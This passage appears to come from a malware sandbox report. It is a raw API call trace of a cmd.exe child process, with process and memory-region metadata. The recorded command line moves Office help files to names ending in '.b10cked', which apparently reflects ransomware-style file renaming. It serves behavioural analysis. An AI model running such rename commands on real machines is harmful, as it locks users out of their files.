lpBuffer=0x18f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f638, lpFilePart=0x18f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f634*="Desktop") returned 0x18 [0202.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.105] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.105] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.105] GetEnvironmentStringsW () returned 0x2b2b00* [0202.105] FreeEnvironmentStringsW (penv=0x2b2b00) returned 1 [0202.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.105] GetConsoleOutputCP () returned 0x1b5 [0202.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.105] GetUserDefaultLCID () returned 0x409 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, 
cchData=8 | out: lpLCData=":") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f778, cchData=128 | out: lpLCData="1") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.106] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.107] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.107] GetProcAddress (hModule=0x76910000, 
lpProcName="CopyFileExW") returned 0x7694ac6c [0202.107] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.107] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.108] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.108] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.108] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.108] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.108] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.108] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.108] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.111] GetConsoleTitleW (in: lpConsoleTitle=0x18f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.111] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.111] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.111] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.111] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.111] 
_wcsicmp (_String1="move", _String2="RD") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.111] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.112] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.112] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.112] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.112] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.112] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.113] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f22c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f224, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f224*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) 
returned 2 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.114] 
_wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.114] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.114] _wcsicmp (_String1="MSOUTL~2.HXN", _String2=".") returned 63 [0202.114] _wcsicmp (_String1="MSOUTL~2.HXN", _String2="..") returned 63 [0202.114] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~2.hxn")) returned 0x2022 [0202.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", nBufferLength=0x104, lpBuffer=0x18ebb4, lpFilePart=0x18eb9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", lpFilePart=0x18eb9c*="MSOUTL~2.HXN") returned 0x27 [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.115] _wcsicmp (_String1="MSOUTL~2.HXN", _String2=".") returned 63 [0202.115] _wcsicmp (_String1="MSOUTL~2.HXN", _String2="..") returned 63 [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~2.hxn")) returned 
0x2022 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", nBufferLength=0x104, lpBuffer=0x18f030, lpFilePart=0x18edc8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", lpFilePart=0x18edc8*="MSOUTL~2.HXN") returned 0x27 [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f238, lpFilePart=0x18edc8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked", lpFilePart=0x18edc8*="MS.OUTLOOK.DEV.14.1033.hxn.b10cked") returned 0x3d [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] SetLastError (dwErrCode=0x0) [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.outlook.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.116] GetLastError () returned 0x2 [0202.116] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e744, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e744) returned 0x2a0e90 [0202.116] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x18e744 | out: lpFindFileData=0x18e744) returned 0 [0202.116] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.116] GetLastError () returned 0x12 [0202.116] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e744, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e744) returned 0x2a0e90 [0202.116] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x18e744 | out: 
lpFindFileData=0x18e744) returned 0 [0202.117] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.117] GetLastError () returned 0x12 [0202.117] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2b1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bf8) returned 0x2a0e90 [0202.117] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x2b1bf8 | out: lpFindFileData=0x2b1bf8) returned 0 [0202.117] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.118] GetLastError () returned 0x12 [0202.118] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2b1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bf8) returned 0x2a0e90 [0202.118] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x2b1bf8 | out: lpFindFileData=0x2b1bf8) returned 0 [0202.118] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.118] GetLastError () returned 0x12 [0202.118] _get_osfhandle (_FileHandle=2) returned 0xb [0202.118] GetFileType (hFile=0xb) returned 0x2 [0202.572] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.572] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18e914 | out: lpMode=0x18e914) returned 1 [0202.572] _get_osfhandle (_FileHandle=2) returned 0xb [0202.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18e948 | out: lpConsoleScreenBufferInfo=0x18e948) returned 1 [0202.573] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.574] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e988 | out: lpBuffer="The system 
cannot find the file specified.\r\n") returned 0x2c [0202.574] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18e96c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e96c*=0x2c) returned 1 [0202.574] longjmp () [0202.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.574] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.574] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.574] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.574] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.574] SetConsoleInputExeNameW () returned 0x1 [0202.574] GetConsoleOutputCP () returned 0x1b5 [0202.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.575] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.575] exit (_Code=1) Process: id = "474" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29326 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29327 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29328 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29329 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 29330 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29331 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29332 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29333 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29334 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29335 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29536 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29537 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
29538 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29539 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 29540 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29541 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29542 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29543 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29544 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29545 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29546 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29547 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29548 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29549 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29606 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 29607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29609 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29610 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 29611 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29612 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29613 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29614 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" 
filename = "" Region: id = 29615 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 29680 start_va = 0x2e0000 end_va = 0x39ffff entry_point = 0x2e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 671 os_tid = 0xfe4 [0201.655] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd9c | out: lpSystemTimeAsFileTime=0x1cfd9c*(dwLowDateTime=0xad02af40, dwHighDateTime=0x1d440a9)) [0201.655] GetCurrentProcessId () returned 0xe48 [0201.655] GetCurrentThreadId () returned 0xfe4 [0201.655] GetTickCount () returned 0x38f15 [0201.655] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd94 | out: lpPerformanceCount=0x1cfd94*=25844415267) returned 1 [0201.659] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.659] __set_app_type (_Type=0x1) [0201.659] __p__fmode () returned 0x76b331f4 [0201.659] __p__commode () returned 0x76b331fc [0201.659] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.659] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.659] GetCurrentThreadId () returned 0xfe4 [0201.660] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe4) returned 0x38 [0201.660] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.660] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.703] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", 
